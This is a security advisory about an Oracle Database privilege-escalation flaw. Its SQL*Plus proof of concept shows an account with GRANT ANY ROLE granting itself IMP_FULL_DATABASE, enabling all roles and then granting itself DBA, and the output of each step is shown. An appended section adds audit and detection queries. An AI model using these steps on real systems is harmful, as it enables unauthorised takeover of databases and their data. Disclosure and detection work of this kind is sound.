Oracle 23ai Privilege Escalation From GRANT ANY ROLE To DBA Role
The article describes a security design flaw in the Oracle database system: an account holding the "GRANT ANY ROLE" privilege can be used to escalate to the "DBA" role. By granting itself a specific role and then enabling all roles, an attacker can successfully elevate the account's privileges. The article recommends stronger protection and auditing of highly privileged accounts to prevent such attacks. 2025-7-7 19:49:47 Author: cxsecurity.com

Title: Oracle 23ai Privilege Escalation From GRANT ANY ROLE To DBA Role
Vendor: Oracle
Product: Oracle database system
Affected Version(s): 23ai, 21c, 19c
Risk Level: Medium
Author of Advisory: Emad Al-Mousa

<Overview>:
Privilege escalation is one of the most common techniques attackers use to abuse and take over critical systems, and database systems in particular must be protected against such attacks to keep data secure. The exploit presented here highlights a security design flaw that system administrators and DBAs should be aware of.

*****************************************************************************************************************************************
<Exploit Summary Details>:
A database account granted the system privilege "GRANT ANY ROLE" can be used to escalate to the "DBA" role.

*****************************************************************************************************************************************
<Proof of Concept (PoC)>:
I will connect as the SYS user and create a local database account called "tom" in the pluggable database FREEPDB1, as shown below:

sqlplus / as sysdba
SQL> alter session set container=FREEPDB1;
Session altered.
SQL> create user tom identified by tom123;
User created.
SQL> grant create session to tom;
Grant succeeded.
SQL> grant grant any role to tom;
Grant succeeded.
SQL> alter user tom default role all;
SQL> exit;

Next, I connect as the tom account directly using sqlplus:

sqlplus "tom/tom123"@FREEPDB1

Attempting to grant the DBA role to myself does not work; it is blocked, as expected, to prevent an escalation attempt:

SQL> grant dba to tom;
grant dba to tom
*
ERROR at line 1:
ORA-01031: insufficient privileges

Attempting to grant the DBA role to another existing account, "hr", does not work either:

SQL> grant dba to hr;
grant dba to hr
*
ERROR at line 1:
ORA-01031: insufficient privileges

The account has limited power, as shown below: it cannot create another database account called "tom2" and cannot view any database table:

SQL> show user
USER is "TOM"
SQL> create user tom2 identified by tom123;
create user tom2 identified by tom123
*
ERROR at line 1:
ORA-01031: insufficient privileges
Help: https://docs.oracle.com/error-help/db/ora-01031/
SQL> select * from HR.DEPT;
select * from HR.DEPT
*
ERROR at line 1:
ORA-00942: table or view "HR"."DEPT" does not exist
Help: https://docs.oracle.com/error-help/db/ora-00942/

The account can grant low-level built-in roles, such as the "resource" role, to other database accounts, as it is designed to do:

SQL> show user
USER is "TOM"
SQL> grant resource to hr_app;
Grant succeeded.

The security weakness is the ability of the account to escalate to the DBA role, as shown below. tom first grants the built-in IMP_FULL_DATABASE role to itself (GRANT ANY ROLE permits this), then runs SET ROLE ALL so that the newly granted role is enabled in the current session (a role granted mid-session is not active until it is set or the user reconnects). The GRANT DBA that was blocked a moment ago now succeeds:

SQL> grant IMP_FULL_DATABASE to tom;
Grant succeeded.
SQL> set role all;
Role set.
SQL> grant dba to tom;
Grant succeeded.

Now account TOM has been elevated to the DBA role!

*****************************************************************************************************************************************
<Remarks & Conclusion>:
A database account holding "GRANT ANY ROLE" is meant to grant roles to "other" accounts. The simple scenario above shows that if such an account is compromised, it can easily be elevated to the "DBA" role. Make sure that the passwords of accounts holding high system privileges are long, complex and protected. And, of course, security auditing greatly helps in detecting privilege escalation attempts in your landscape.
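The advisory recommends auditing but does not show what to look for. The following is an added example, not part of the original advisory or the author's material: the inventory queries an administrator would run to find accounts able to reproduce the PoC, a look at what IMP_FULL_DATABASE actually carries on the instance, and a unified-audit policy plus a detection query that surfaces the self-grants in the PoC (including the earlier blocked attempts, which are recorded with a non-zero return code). It assumes unified auditing is in use, that the statements run inside the PDB (e.g. FREEPDB1) as a user holding AUDIT_ADMIN and access to the DBA_* views, and the policy name grant_role_watch is made up for this example.

```sql
-- Added example, not from the original advisory. Assumes unified auditing
-- and a session inside the PDB as a user holding AUDIT_ADMIN plus access to
-- the DBA_* / ROLE_* views. The policy name grant_role_watch is hypothetical.

-- 1. Inventory: who holds GRANT ANY ROLE (or GRANT ANY PRIVILEGE)?
--    Every grantee listed here can run the PoC as written.
SELECT grantee, privilege, admin_option, common
  FROM dba_sys_privs
 WHERE privilege IN ('GRANT ANY ROLE', 'GRANT ANY PRIVILEGE')
 ORDER BY grantee, privilege;

-- 2. Who already holds the stepping-stone role or the target role?
SELECT grantee, granted_role, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role IN ('DBA', 'IMP_FULL_DATABASE', 'DATAPUMP_IMP_FULL_DATABASE')
 ORDER BY granted_role, grantee;

-- 3. What does IMP_FULL_DATABASE carry on this instance? Walk the roles
--    nested inside it, then list every system privilege those roles hold,
--    so the effect of "grant IMP_FULL_DATABASE to tom" is visible.
WITH nested (role_name) AS (
  SELECT CAST('IMP_FULL_DATABASE' AS VARCHAR2(128)) FROM dual
  UNION ALL
  SELECT rrp.granted_role
    FROM role_role_privs rrp
    JOIN nested n ON rrp.role = n.role_name
)
SELECT rsp.role, rsp.privilege, rsp.admin_option
  FROM role_sys_privs rsp
  JOIN nested n ON rsp.role = n.role_name
 ORDER BY rsp.role, rsp.privilege;

-- 4. Audit every exercise of the GRANT ANY ROLE privilege and every GRANT
--    statement, for all users, so the self-grant in the PoC leaves a record.
--    Both successful and failed statements are captured by default.
CREATE AUDIT POLICY grant_role_watch
  PRIVILEGES GRANT ANY ROLE
  ACTIONS GRANT;
AUDIT POLICY grant_role_watch;

-- 5. Detection: GRANT statements by a non-SYS user where the grantee named
--    in the statement is the issuing user itself ("grant IMP_FULL_DATABASE
--    to tom", "grant dba to tom"), or where DBA / IMP_FULL_DATABASE is
--    handed out at all. return_code 0 = succeeded, 1031 = blocked attempt.
SELECT event_timestamp, dbusername, action_name, return_code, sql_text
  FROM unified_audit_trail
 WHERE unified_audit_policies LIKE '%GRANT_ROLE_WATCH%'
   AND dbusername <> 'SYS'
   AND ( REGEXP_LIKE(sql_text, '(^|\s)TO\s+"?' || dbusername || '"?(\s|;|$)', 'i')
      OR REGEXP_LIKE(sql_text, '(^|\s)GRANT\s+(DBA|IMP_FULL_DATABASE)(\s|,|;|$)', 'i') )
 ORDER BY event_timestamp;
```

Run the PoC against a test PDB after enabling the policy: query 5 should return the two ORA-01031 attempts with return_code 1031 followed by the two successful self-grants with return_code 0, all under DBUSERNAME TOM. The self-grant match relies on the grantee name appearing in SQL_TEXT, so it will not catch a grant routed through a PL/SQL wrapper; the second REGEXP_LIKE branch is the broader net for that case.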
*****************************************************************************************************************************************
References:
https://databasesecurityninja.wordpress.com/2025/07/02/oracle-23ai-privilege-escalation-from-grant-any-role-to-dba-role/
https://docs.oracle.com/en/database/oracle/oracle-database/23/dbseg/configuring-privilege-and-role-authorization.html#GUID-FEC9C8E4-B935-405B-8994-9AC5A71C6DD7

Source: https://cxsecurity.com/issue/WLB-2025070010